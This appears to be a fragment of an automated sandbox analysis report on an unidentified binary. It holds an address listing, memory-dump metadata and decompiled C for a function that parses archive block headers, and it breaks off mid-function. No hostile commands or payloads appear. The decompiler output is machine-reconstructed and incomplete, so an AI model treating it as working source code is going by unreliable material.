                            0x00a0d4ad
                            0x00000000
                            0x00a0d451
                            0x00a0d414
                            0x00a0d414
                            0x00a0d416
                            0x00a0d41c
                            0x00a0d423
                            0x00a0d423
                            0x00a0d426
                            0x00a0d426
                            0x00000000
                            0x00a0d416
                            0x00000000
                            0x00a0d4fa
                            0x00a0d4fa
                            0x00a0d4fb
                            0x00a0d4fb
                            0x00000000
                            0x00a0d400
                            0x00a0d31b
                            0x00a0d31b
                            0x00a0d32d
                            0x00a0d33c
                            0x00a0d341
                            0x00a0d344
                            0x00a0d346
                            0x00000000
                            0x00a0d34c
                            0x00a0d34c
                            0x00a0d34f
                            0x00000000
                            0x00a0d355
                            0x00a0d355
                            0x00a0d35c
                            0x00000000
                            0x00a0d362
                            0x00a0d368
                            0x00a0d36a
                            0x00a0d370
                            0x00a0d370
                            0x00a0d372
                            0x00a0d372
                            0x00a0d374
                            0x00a0d37d
                            0x00a0d384
                            0x00a0d387
                            0x00a0d388
                            0x00a0d38a
                            0x00a0d38a
                            0x00000000
                            0x00a0d392
                            0x00a0d35c
                            0x00a0d34f
                            0x00a0d346
                            0x00a0d27f
                            0x00a0d27f
                            0x00a0d285
                            0x00a0d287
                            0x00a0d2a3
                            0x00a0d2a6
                            0x00000000
                            0x00a0d2ac
                            0x00a0d2ac
                            0x00a0d2b3
                            0x00000000
                            0x00a0d2b9
                            0x00a0d2bf
                            0x00a0d2c1
                            0x00a0d2c7
                            0x00a0d2c7
                            0x00a0d2c9
                            0x00a0d2c9
                            0x00a0d2cb
                            0x00a0d2d4
                            0x00a0d2db
                            0x00a0d2de
                            0x00a0d2df
                            0x00a0d2e1
                            0x00a0d2e1
                            0x00a0d2e9
                            0x00a0d2e9
                            0x00a0d2eb
                            0x00000000
                            0x00a0d2f1
                            0x00a0d2f1
                            0x00a0d2f7
                            0x00a0d2fa
                            0x00a0d5c4
                            0x00a0d5c7
                            0x00a0d5cd
                            0x00a0d5e2
                            0x00a0d5e7
                            0x00a0d5ea
                            0x00a0d300
                            0x00a0d300
                            0x00a0d307
                            0x00000000
                            0x00a0d307
                            0x00a0d2fa
                            0x00a0d2eb
                            0x00a0d2b3
                            0x00a0d289
                            0x00a0d289
                            0x00a0d28b
                            0x00a0d291
                            0x00a0d297
                            0x00a0d298
                            0x00a0d515
                            0x00a0d515
                            0x00a0d51c
                            0x00a0d51d
                            0x00a0d51e
                            0x00a0d523
                            0x00a0d526
                            0x00a0d526
                            0x00a0d526
                            0x00a0d287
                            0x00a0d528
                            0x00a0d528
                            0x00a0d52a
                            0x00a0d5f1
                            0x00a0d5f8
                            0x00a0d5ff
                            0x00a0d612
                            0x00a0d618
                            0x00a0d619
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0d530
                            0x00a0d536
                            0x00a0d536
                            0x00a0d53c
                            0x00a0d53c
                            0x00a0d548
                            0x00000000
                            0x00a0d548
                            0x00a0cd85
                            0x00a0cd85
                            0x00a0cd87
                            0x00a0cd8d
                            0x00a0cd8f
                            0x00a0cd95
                            0x00a0cd97
                            0x00a0d10e
                            0x00a0d10e
                            0x00a0d110
                            0x00a0d116
                            0x00a0d11d
                            0x00a0d11f
                            0x00a0d17e
                            0x00a0d181
                            0x00a0d187
                            0x00a0d18d
                            0x00a0d193
                            0x00a0d195
                            0x00a0d19b
                            0x00a0d19d
                            0x00a0d19d
                            0x00a0d19f
                            0x00a0d19f
                            0x00a0d1a1
                            0x00a0d1aa
                            0x00a0d1b1
                            0x00a0d1b4
                            0x00a0d1b5
                            0x00a0d1b7
                            0x00a0d1b7
                            0x00a0d1bf
                            0x00a0d1c1
                            0x00a0d1c7
                            0x00a0d1cd
                            0x00a0d1d0
                            0x00000000
                            0x00a0d1d6
                            0x00a0d1d6
                            0x00a0d1dd
                            0x00a0d1dd
                            0x00a0d1d0
                            0x00a0d1c1
                            0x00a0d195
                            0x00a0d121
                            0x00a0d121
                            0x00a0d123
                            0x00a0d129
                            0x00a0d12f
                            0x00000000
                            0x00a0d12f
                            0x00a0d11f
                            0x00a0cd9d
                            0x00a0cd9d
                            0x00a0cd9d
                            0x00a0cda0
                            0x00a0cda4
                            0x00a0cda4
                            0x00a0cda5
                            0x00a0cdb7
                            0x00a0cdc4
                            0x00a0cdd3
                            0x00a0cdfd
                            0x00a0ce02
                            0x00a0ce08
                            0x00a0ce0b
                            0x00a0ce11
                            0x00a0ce14
                            0x00a0ce90
                            0x00a0ce97
                            0x00a0cf5b
                            0x00a0cf61
                            0x00a0cf67
                            0x00a0cf6a
                            0x00a0cf6c
                            0x00a0cff5
                            0x00a0cf72
                            0x00a0cf72
                            0x00a0cf78
                            0x00a0cf78
                            0x00a0cf7e
                            0x00a0cf84
                            0x00a0cf86
                            0x00a0cf88
                            0x00a0cf88
                            0x00a0cf8e
                            0x00a0cf94
                            0x00a0cf96
                            0x00a0cf9e
                            0x00a0cf9e
                            0x00a0cfa4
                            0x00a0cfa6
                            0x00a0cfa8
                            0x00a0cfae
                            0x00a0cfb0
                            0x00a0d0c7
                            0x00a0d0c9
                            0x00a0d0cf
                            0x00a0d0cf
                            0x00000000
                            0x00a0cfb6
                            0x00a0cfbc
                            0x00a0cfbc
                            0x00a0cfbe
                            0x00a0cfc4
                            0x00a0cfc7
                            0x00a0cfce
                            0x00a0cfd4
                            0x00a0cfd6
                            0x00a0cffd
                            0x00a0cfff
                            0x00a0d001
                            0x00a0d003
                            0x00a0d009
                            0x00a0d00f
                            0x00a0d0a9
                            0x00a0d0a9
                            0x00a0d0ac
                            0x00000000
                            0x00a0d0b2
                            0x00a0d0b2
                            0x00a0d0b8
                            0x00000000
                            0x00a0d0b8
                            0x00a0d015
                            0x00a0d015
                            0x00a0d015
                            0x00a0d018
                            0x00000000
                            0x00000000
                            0x00a0d01a
                            0x00a0d01c
                            0x00a0d01e
                            0x00a0d027
                            0x00a0d027
                            0x00a0d029
                            0x00a0d02f
                            0x00a0d02f
                            0x00a0d03b
                            0x00a0d046
                            0x00a0d049
                            0x00a0d056
                            0x00a0d059
                            0x00a0d05a
                            0x00a0d05b
                            0x00a0d061
                            0x00a0d063
                            0x00a0d069
                            0x00a0d06f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0d071
                            0x00a0d071
                            0x00a0d071
                            0x00a0d073
                            0x00000000
                            0x00000000
                            0x00a0d075
                            0x00a0d078
                            0x00a0d132
                            0x00a0d132
                            0x00a0d134
                            0x00a0d13a
                            0x00a0d140
                            0x00a0d141
                            0x00000000
                            0x00a0d07e
                            0x00a0d07e
                            0x00a0d080
                            0x00a0d082
                            0x00a0d082
                            0x00a0d082
                            0x00a0d08a
                            0x00a0d08d
                            0x00a0d08d
                            0x00a0d093
                            0x00a0d095
                            0x00a0d097
                            0x00a0d09e
                            0x00a0d0a4
                            0x00a0d0a6
                            0x00000000
                            0x00a0d0a6
                            0x00000000
                            0x00a0d078
                            0x00000000
                            0x00a0d071
                            0x00000000
                            0x00a0d015
                            0x00a0cfd8
                            0x00a0cfd8
                            0x00a0cfda
                            0x00a0cfe0
                            0x00a0cfe7
                            0x00a0cfe7
                            0x00a0cfea
                            0x00a0cfea
                            0x00000000
                            0x00a0cfda
                            0x00000000
                            0x00a0d0be
                            0x00a0d0be
                            0x00a0d0bf
                            0x00a0d0bf
                            0x00000000
                            0x00a0cfc4
                            0x00a0ce9d
                            0x00a0ce9d
                            0x00a0ceaf
                            0x00a0cebe
                            0x00a0cec3
                            0x00a0cec6
                            0x00a0cec8
                            0x00a0cee4
                            0x00a0cee7
                            0x00000000
                            0x00a0ceed
                            0x00a0ceed
                            0x00a0cef4
                            0x00000000
                            0x00a0cefa
                            0x00a0cf00
                            0x00a0cf02
                            0x00a0cf08
                            0x00a0cf08
                            0x00a0cf0a
                            0x00a0cf0a
                            0x00a0cf0c
                            0x00a0cf15
                            0x00a0cf1c
                            0x00a0cf1f
                            0x00a0cf20
                            0x00a0cf22
                            0x00a0cf22
                            0x00000000
                            0x00a0cf0a
                            0x00a0cef4
                            0x00a0ceca
                            0x00a0cecc
                            0x00a0ced2
                            0x00a0ced8
                            0x00a0ced9
                            0x00000000
                            0x00a0ced9
                            0x00a0cec8
                            0x00a0ce16
                            0x00a0ce16
                            0x00a0ce1c
                            0x00a0ce1e
                            0x00a0ce33
                            0x00a0ce36
                            0x00000000
                            0x00a0ce3c
                            0x00a0ce3c
                            0x00a0ce43
                            0x00000000
                            0x00a0ce49
                            0x00a0ce4f
                            0x00a0ce51
                            0x00a0ce57
                            0x00a0ce57
                            0x00a0ce59
                            0x00a0ce59
                            0x00a0ce5b
                            0x00a0ce64
                            0x00a0ce6b
                            0x00a0ce6e
                            0x00a0ce6f
                            0x00a0ce71
                            0x00a0ce71
                            0x00a0cf2a
                            0x00a0cf2a
                            0x00a0cf2c
                            0x00000000
                            0x00a0cf32
                            0x00a0cf32
                            0x00a0cf38
                            0x00a0cf3b
                            0x00a0ce7e
                            0x00a0ce85
                            0x00000000
                            0x00a0cf41
                            0x00a0cf43
                            0x00a0cf49
                            0x00a0cf4f
                            0x00a0cf50
                            0x00a0d147
                            0x00a0d147
                            0x00a0d14e
                            0x00a0d14f
                            0x00a0d150
                            0x00a0d155
                            0x00a0d158
                            0x00a0d158
                            0x00a0cf3b
                            0x00a0cf2c
                            0x00a0ce43
                            0x00a0ce20
                            0x00a0ce20
                            0x00a0ce22
                            0x00a0ce28
                            0x00a0d0d2
                            0x00a0d0d2
                            0x00a0d0d3
                            0x00a0d0d9
                            0x00a0d0d9
                            0x00a0d0e0
                            0x00a0d0e1
                            0x00a0d0e2
                            0x00a0d0e7
                            0x00a0d0ea
                            0x00a0d0ea
                            0x00a0d0ea
                            0x00a0ce1e
                            0x00a0d0ec
                            0x00a0d0ec
                            0x00a0d0ee
                            0x00a0d15c
                            0x00a0d163
                            0x00a0d163
                            0x00a0d163
                            0x00a0d16a
                            0x00a0d16c
                            0x00a0d172
                            0x00a0d173
                            0x00a0d61f
                            0x00a0d61f
                            0x00a0d620
                            0x00a0d621
                            0x00a0d626
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0d0f0
                            0x00a0d0f6
                            0x00a0d0f6
                            0x00a0d0fc
                            0x00a0d0fc
                            0x00a0d108
                            0x00000000
                            0x00a0d108
                            0x00a0cd97
                            0x00a0d629
                            0x00a0d629
                            0x00a0d62f
                            0x00a0d631
                            0x00a0d637
                            0x00a0d63d
                            0x00a0d63f
                            0x00a0d641
                            0x00a0d643
                            0x00a0d643
                            0x00a0d645
                            0x00a0d645
                            0x00a0d64e
                            0x00a0d64f
                            0x00a0d653
                            0x00a0d65a
                            0x00a0d65d
                            0x00a0d65e
                            0x00a0d660
                            0x00a0d660
                            0x00a0d664
                            0x00a0d66a
                            0x00a0d66c
                            0x00a0d672
                            0x00a0d674
                            0x00a0d67a
                            0x00a0d67d
                            0x00a0d690
                            0x00a0d693
                            0x00a0d699
                            0x00a0d6ae
                            0x00a0d6b3
                            0x00a0d67f
                            0x00a0d681
                            0x00a0d688
                            0x00a0d688
                            0x00a0d67d
                            0x00a0d6b6
                            0x00a0d6b6
                            0x00a0d6c6
                            0x00a0d6cf
                            0x00a0d6d0
                            0x00a0d6d2
                            0x00a0d769
                            0x00a0d76b
                            0x00a0d776
                            0x00a0d776
                            0x00a0d778
                            0x00a0d77b
                            0x00a0d77d
                            0x00000000
                            0x00a0d76d
                            0x00a0d773
                            0x00a0d773
                            0x00a0d6d8
                            0x00a0d6d8
                            0x00a0d6de
                            0x00a0d6e1
                            0x00a0d6e7
                            0x00a0d6ea
                            0x00a0d6f0
                            0x00a0d6f2
                            0x00a0d6f8
                            0x00a0d6fa
                            0x00a0d6fc
                            0x00a0d6fc
                            0x00a0d6fe
                            0x00a0d6fe
                            0x00a0d70b
                            0x00a0d712
                            0x00a0d715
                            0x00a0d716
                            0x00a0d718
                            0x00a0d719
                            0x00a0d719
                            0x00a0d71d
                            0x00a0d723
                            0x00a0d725
                            0x00a0d727
                            0x00a0d72d
                            0x00a0d730
                            0x00a0d744
                            0x00a0d74a
                            0x00a0d75f
                            0x00a0d764
                            0x00a0d732
                            0x00a0d732
                            0x00a0d739
                            0x00a0d739
                            0x00a0d730
                            0x00a0d725
                            0x00a0d783
                            0x00a0d783
                            0x00a0d783
                            0x00a0d78f
                            0x00a0d792
                            0x00a0d798
                            0x00a0d79a
                            0x00a0d79c
                            0x00a0d7a2
                            0x00a0d7a4
                            0x00a0d7a4
                            0x00a0d7a4
                            0x00a0d7a2
                            0x00a0d7a9
                            0x00a0d7aa
                            0x00a0d7ac
                            0x00a0d7ae
                            0x00a0d7ae
                            0x00a0d7b0
                            0x00a0d7b6
                            0x00a0d7bc
                            0x00a0d7be
                            0x00a0d7c4
                            0x00a0d7c4
                            0x00a0d7ca
                            0x00a0d7cc
                            0x00000000
                            0x00000000
                            0x00a0d7d2
                            0x00a0d7d4
                            0x00a0d7d6
                            0x00a0d7d6
                            0x00a0d7d8
                            0x00a0d7d8
                            0x00a0d7e8
                            0x00a0d7ef
                            0x00a0d7f2
                            0x00a0d7f3
                            0x00a0d7f5
                            0x00a0d7f5
                            0x00a0d7f9
                            0x00a0d7ff
                            0x00a0d801
                            0x00a0d803
                            0x00a0d809
                            0x00a0d80c
                            0x00a0d81d
                            0x00a0d820
                            0x00a0d826
                            0x00a0d83b
                            0x00a0d840
                            0x00a0d80e
                            0x00a0d80e
                            0x00a0d815
                            0x00a0d815
                            0x00a0d80c
                            0x00a0d851
                            0x00a0d860
                            0x00a0d861
                            0x00a0d861
                            0x00a0d863
                            0x00a0d865
                            0x00a0d865
                            0x00a0d86b
                            0x00a0d86e
                            0x00a0d870
                            0x00a0d872
                            0x00a0d872
                            0x00a0d875
                            0x00a0d876
                            0x00a0d876
                            0x00a0d87b
                            0x00a0d87e
                            0x00a0d882
                            0x00a0d882
                            0x00a0d883
                            0x00a0d885
                            0x00a0d88b
                            0x00a0d891
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0d891
                            0x00a0d7c4
                            0x00a0d897
                            0x00a0d897
                            0x00000000
                            0x00a0d897
                            0x00a0c61c
                            0x00a0c613
                            0x00a0c60a
                            0x00a0c5c1
                            0x00a0c5c5
                            0x00a0c5cd
                            0x00000000
                            0x00a0c5cf
                            0x00a0c5d5
                            0x00a0c5da
                            0x00a0d8b6
                            0x00a0d8b6
                            0x00a0d8b9
                            0x00a0d8c4
                            0x00a0d8ef
                            0x00a0d8f0
                            0x00a0d8f1
                            0x00a0d8f2
                            0x00a0d8f3
                            0x00a0d8f4
                            0x00a0d8f9
                            0x00a0d901
                            0x00a0d906
                            0x00a0d90c
                            0x00a0d911
                            0x00a0d912
                            0x00a0d912
                            0x00a0d912
                            0x00a0d918
                            0x00a0d919
                            0x00a0d919
                            0x00a0d91c
                            0x00a0d922
                            0x00000000
                            0x00000000
                            0x00a0d924
                            0x00a0d929
                            0x00a0d92c
                            0x00a0d92e
                            0x00a0d936
                            0x00a0d938
                            0x00a0d93a
                            0x00a0d93f
                            0x00a0d942
                            0x00a0d948
                            0x00a0d94b
                            0x00a0d94d
                            0x00a0d94d
                            0x00a0d94d
                            0x00a0d94d
                            0x00a0d94b
                            0x00a0d950
                            0x00a0d95c
                            0x00a0d962
                            0x00a0d96a
                            0x00a0d96f
                            0x00a0d970
                            0x00a0d975
                            0x00a0d975
                            0x00a0d975
                            0x00a0d975
                            0x00a0d979
                            0x00a0d979
                            0x00a0d97c
                            0x00a0d983
                            0x00a0d990
                            0x00a0d8c6
                            0x00a0d8c6
                            0x00a0d8c6
                            0x00a0d8d0
                            0x00a0d8d9
                            0x00a0d8de
                            0x00a0d8ec
                            0x00a0d8ec
                            0x00a0d8c4
                            0x00a0c5cd

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __floor_pentium4
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                            • API String ID: 4168288129-2761157908
                            • Opcode ID: ffabda89fea6f1b13065ac14b2e736e4aaa33200aa025b3bc2dad904f4e887d1
                            • Instruction ID: 5221b7836262db0931c4ba37502d518b45fb2811139f827013b42afb6a62be3d
                            • Opcode Fuzzy Hash: ffabda89fea6f1b13065ac14b2e736e4aaa33200aa025b3bc2dad904f4e887d1
                            • Instruction Fuzzy Hash: 4BC21872E0462C8BDB25CF68ED407EAB7B5EB44354F1442EAD84DE7280E775AE858F40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E2692, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 783COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E009E2692(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t333;
				signed int _t337;
				char _t356;
				signed short _t363;
				signed int _t368;
				signed int _t374;
				signed char _t376;
				signed char _t379;
				char _t396;
				signed int _t397;
				signed int _t401;
				signed char _t415;
				intOrPtr _t416;
				char _t417;
				signed int _t420;
				signed int _t421;
				signed char _t426;
				signed int _t429;
				signed int _t433;
				signed short _t438;
				signed short _t443;
				unsigned int _t448;
				signed int _t451;
				void* _t454;
				signed int _t456;
				signed int _t459;
				void* _t466;
				signed int _t472;
				unsigned int _t476;
				void* _t477;
				void* _t484;
				void* _t485;
				signed char _t491;
				signed int _t505;
				intOrPtr* _t518;
				signed int _t521;
				signed int _t522;
				intOrPtr* _t523;
				signed int _t531;
				signed int _t536;
				signed int _t538;
				unsigned int _t547;
				signed int _t549;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				void* _t586;
				signed int _t590;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				unsigned int _t612;
				signed char _t628;
				signed char _t638;
				signed int _t641;
				unsigned int _t642;
				signed int _t645;
				signed int _t646;
				signed int _t648;
				signed int _t649;
				unsigned int _t651;
				signed int _t655;
				void* _t656;
				void* _t663;
				signed int _t666;
				signed int _t667;
				signed char _t668;
				signed int _t671;
				void* _t673;
				signed int _t679;
				signed int _t680;
				void* _t685;
				signed int _t686;
				signed int _t687;
				signed int _t694;
				signed int _t695;
				intOrPtr _t697;
				void* _t698;
				signed char _t707;

				_t523 = __ecx;
				E009FD870(E00A11197, _t698);
				E009FD940();
				_t518 = _t523;
				 *((intOrPtr*)(_t698 + 0x20)) = _t518;
				E009EC223(_t698 + 0x24, _t518);
				 *((intOrPtr*)(_t698 + 0x1c)) = 0;
				 *((intOrPtr*)(_t698 - 4)) = 0;
				_t655 = 7;
				if( *(_t518 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t698 + 0x5f)) = 0;
					L7:
					E009EC42E(_t638, _t655);
					if( *((intOrPtr*)(_t698 + 0x3c)) != 0) {
						 *(_t518 + 0x21e4) = E009EC269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f4) = 0;
						_t679 = E009EC251(_t698 + 0x24) & 0x000000ff;
						_t333 = E009EC269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21ec) = _t333;
						 *(_t518 + 0x21f4) = _t333 >> 0x0000000e & 0x00000001;
						_t531 = E009EC269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f0) = _t531;
						 *(_t518 + 0x21e8) = _t679;
						__eflags = _t531 - _t655;
						if(_t531 >= _t655) {
							_t680 = _t679 - 0x73;
							__eflags = _t680;
							if(_t680 == 0) {
								 *(_t518 + 0x21e8) = 1;
							} else {
								_t694 = _t680 - 1;
								__eflags = _t694;
								if(_t694 == 0) {
									 *(_t518 + 0x21e8) = 2;
								} else {
									_t695 = _t694 - 6;
									__eflags = _t695;
									if(_t695 == 0) {
										 *(_t518 + 0x21e8) = 3;
									} else {
										__eflags = _t695 == 1;
										if(_t695 == 1) {
											 *(_t518 + 0x21e8) = 5;
										}
									}
								}
							}
							_t337 =  *(_t518 + 0x21e8);
							 *(_t518 + 0x21dc) = _t337;
							__eflags = _t337 - 0x75;
							if(_t337 != 0x75) {
								__eflags = _t337 - 1;
								if(_t337 != 1) {
									L23:
									_push(_t531 - 7);
									L24:
									E009EC42E(_t638);
									 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca0)) + E009E1901(_t518,  *(_t518 + 0x21f0));
									_t536 =  *(_t518 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t518 + 0x6cac) =  *(_t518 + 0x6ca4);
									 *(_t698 + 0x50) = _t536;
									__eflags = _t536 - 1;
									if(__eflags == 0) {
										_t656 = _t518 + 0x2208;
										E009EA96C(_t656);
										_t538 = 5;
										memcpy(_t656, _t518 + 0x21e4, _t538 << 2);
										 *(_t518 + 0x221c) = E009EC269(_t698 + 0x24);
										_t638 = E009EC29E(_t698 + 0x24);
										 *(_t518 + 0x2220) = _t638;
										 *(_t518 + 0x6cb5) =  *(_t518 + 0x2210) & 0x00000001;
										 *(_t518 + 0x6cb4) =  *(_t518 + 0x2210) >> 0x00000003 & 0x00000001;
										_t547 =  *(_t518 + 0x2210);
										 *(_t518 + 0x6cb7) = _t547 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x6cbb) = _t547 >> 0x00000006 & 0x00000001;
										 *(_t518 + 0x6cbc) = _t547 >> 0x00000007 & 0x00000001;
										__eflags = _t638;
										if(_t638 != 0) {
											L119:
											_t356 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t518 + 0x6cb8)) = _t356;
											 *(_t518 + 0x2224) = _t547 >> 0x00000001 & 0x00000001;
											_t549 = _t547 >> 0x00000004 & 0x00000001;
											__eflags = _t549;
											 *(_t518 + 0x6cb9) = _t547 >> 0x00000008 & 0x00000001;
											 *(_t518 + 0x6cba) = _t549;
											L121:
											_t655 = 7;
											L122:
											_t363 = E009EC34F(_t698 + 0x24, 0);
											__eflags =  *(_t518 + 0x21e4) - (_t363 & 0x0000ffff);
											if( *(_t518 + 0x21e4) == (_t363 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t698 + 0x1c)) =  *((intOrPtr*)(_t698 + 0x3c));
												goto L133;
											}
											_t368 =  *(_t518 + 0x21e8);
											__eflags = _t368 - 0x79;
											if(_t368 == 0x79) {
												goto L132;
											}
											__eflags = _t368 - 0x76;
											if(_t368 == 0x76) {
												goto L132;
											}
											__eflags = _t368 - 5;
											if(_t368 != 5) {
												L130:
												 *((char*)(_t518 + 0x6cc4)) = 1;
												E009E6E03(0xa200e0, 3);
												__eflags =  *((char*)(_t698 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E009E6BF5(__eflags, 4, _t518 + 0x1e, _t518 + 0x1e);
												 *((char*)(_t518 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t518 + 0x45ae);
											if( *(_t518 + 0x45ae) == 0) {
												goto L130;
											}
											_t374 =  *((intOrPtr*)( *_t518 + 0x14))() - _t655;
											__eflags = _t374;
											asm("sbb edx, ecx");
											 *((intOrPtr*)( *_t518 + 0x10))(_t374, _t638, 0);
											 *(_t698 + 0x5e) = 1;
											do {
												_t376 = E009E972B(_t518);
												asm("sbb al, al");
												_t379 =  !( ~_t376) &  *(_t698 + 0x5e);
												 *(_t698 + 0x5e) = _t379;
												_t655 = _t655 - 1;
												__eflags = _t655;
											} while (_t655 != 0);
											__eflags = _t379;
											if(_t379 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t356 = 0;
										__eflags =  *(_t518 + 0x221c);
										if( *(_t518 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t518 + 0x21ec) & 0x00008000;
										if(( *(_t518 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca8)) + E009EC29E(_t698 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t536 - 3;
									if(_t536 <= 3) {
										__eflags = _t536 - 2;
										_t64 = (0 | _t536 != 0x00000002) - 1; // -1
										_t663 = (_t64 & 0xffffdcb0) + 0x45d0 + _t518;
										 *(_t698 + 0x48) = _t663;
										E009EA8D2(_t663, 0);
										_t560 = 5;
										memcpy(_t663, _t518 + 0x21e4, _t560 << 2);
										_t685 =  *(_t698 + 0x48);
										_t666 =  *(_t698 + 0x50);
										_t562 =  *(_t685 + 8);
										 *(_t685 + 0x1098) =  *(_t685 + 8) & 1;
										 *(_t685 + 0x1099) = _t562 >> 0x00000001 & 1;
										 *(_t685 + 0x109b) = _t562 >> 0x00000002 & 1;
										 *(_t685 + 0x10a0) = _t562 >> 0x0000000a & 1;
										__eflags = _t666 - 2;
										if(_t666 != 2) {
											L35:
											_t641 = 0;
											__eflags = 0;
											_t396 = 0;
											L36:
											 *((char*)(_t685 + 0x10f0)) = _t396;
											__eflags = _t666 - 2;
											if(_t666 == 2) {
												L39:
												_t397 = _t641;
												L40:
												 *(_t685 + 0x10fa) = _t397;
												_t563 = _t562 & 0x000000e0;
												__eflags = _t563 - 0xe0;
												 *((char*)(_t685 + 0x10f1)) = 0 | _t563 == 0x000000e0;
												__eflags = _t563 - 0xe0;
												if(_t563 != 0xe0) {
													_t642 =  *(_t685 + 8);
													_t401 = 0x10000 << (_t642 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t401 = _t641;
													_t642 =  *(_t685 + 8);
												}
												 *(_t685 + 0x10f4) = _t401;
												 *(_t685 + 0x10f3) = _t642 >> 0x0000000b & 0x00000001;
												 *(_t685 + 0x10f2) = _t642 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t685 + 0x14)) = E009EC29E(_t698 + 0x24);
												 *(_t698 + 0x54) = E009EC29E(_t698 + 0x24);
												 *((char*)(_t685 + 0x18)) = E009EC251(_t698 + 0x24);
												 *(_t685 + 0x1070) = 2;
												 *((intOrPtr*)(_t685 + 0x1074)) = E009EC29E(_t698 + 0x24);
												 *(_t698 + 0x18) = E009EC29E(_t698 + 0x24);
												 *(_t685 + 0x1c) = E009EC251(_t698 + 0x24) & 0x000000ff;
												 *((char*)(_t685 + 0x20)) = E009EC251(_t698 + 0x24) - 0x30;
												 *(_t698 + 0x4c) = E009EC269(_t698 + 0x24) & 0x0000ffff;
												_t415 = E009EC29E(_t698 + 0x24);
												_t645 =  *(_t685 + 0x1c);
												 *(_t698 + 0x58) = _t415;
												 *(_t685 + 0x24) = _t415;
												__eflags = _t645 - 0x14;
												if(_t645 < 0x14) {
													__eflags = _t415 & 0x00000010;
													if((_t415 & 0x00000010) != 0) {
														 *((char*)(_t685 + 0x10f1)) = 1;
													}
												}
												 *(_t685 + 0x109c) = 0;
												__eflags =  *(_t685 + 0x109b);
												if( *(_t685 + 0x109b) == 0) {
													L55:
													_t416 =  *((intOrPtr*)(_t685 + 0x18));
													 *(_t685 + 0x10fc) = 2;
													__eflags = _t416 - 3;
													if(_t416 == 3) {
														L59:
														 *(_t685 + 0x10fc) = 1;
														L60:
														 *(_t685 + 0x1100) = 0;
														__eflags = _t416 - 3;
														if(_t416 == 3) {
															__eflags = ( *(_t698 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t698 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t685 + 0x1100) = 1;
																 *((short*)(_t685 + 0x1104)) = 0;
															}
														}
														__eflags = _t666 - 2;
														if(_t666 == 2) {
															L66:
															_t417 = 0;
															goto L67;
														} else {
															__eflags =  *(_t685 + 0x24);
															if( *(_t685 + 0x24) >= 0) {
																goto L66;
															}
															_t417 = 1;
															L67:
															 *((char*)(_t685 + 0x10f8)) = _t417;
															_t420 =  *(_t685 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t420;
															 *(_t685 + 0x10f9) = _t420;
															if(_t420 == 0) {
																__eflags =  *(_t698 + 0x54) - 0xffffffff;
																_t638 = 0;
																_t667 = 0;
																_t137 =  *(_t698 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t421 = _t420 & 0xffffff00 | _t137;
																L73:
																 *(_t685 + 0x109a) = _t421;
																 *((intOrPtr*)(_t685 + 0x1058)) = 0 +  *((intOrPtr*)(_t685 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t685 + 0x105c)) = _t667;
																asm("adc edx, ecx");
																 *(_t685 + 0x1060) = 0 +  *(_t698 + 0x54);
																__eflags =  *(_t685 + 0x109a);
																 *(_t685 + 0x1064) = _t638;
																if( *(_t685 + 0x109a) != 0) {
																	 *(_t685 + 0x1060) = 0x7fffffff;
																	 *(_t685 + 0x1064) = 0x7fffffff;
																}
																_t426 =  *(_t698 + 0x4c);
																_t668 = 0x1fff;
																 *(_t698 + 0x54) = 0x1fff;
																__eflags = _t426 - 0x1fff;
																if(_t426 < 0x1fff) {
																	_t668 = _t426;
																	 *(_t698 + 0x54) = _t426;
																}
																E009EC300(_t698 + 0x24, _t698 - 0x2030, _t668);
																_t429 = 0;
																__eflags =  *(_t698 + 0x50) - 2;
																 *((char*)(_t698 + _t668 - 0x2030)) = 0;
																if( *(_t698 + 0x50) != 2) {
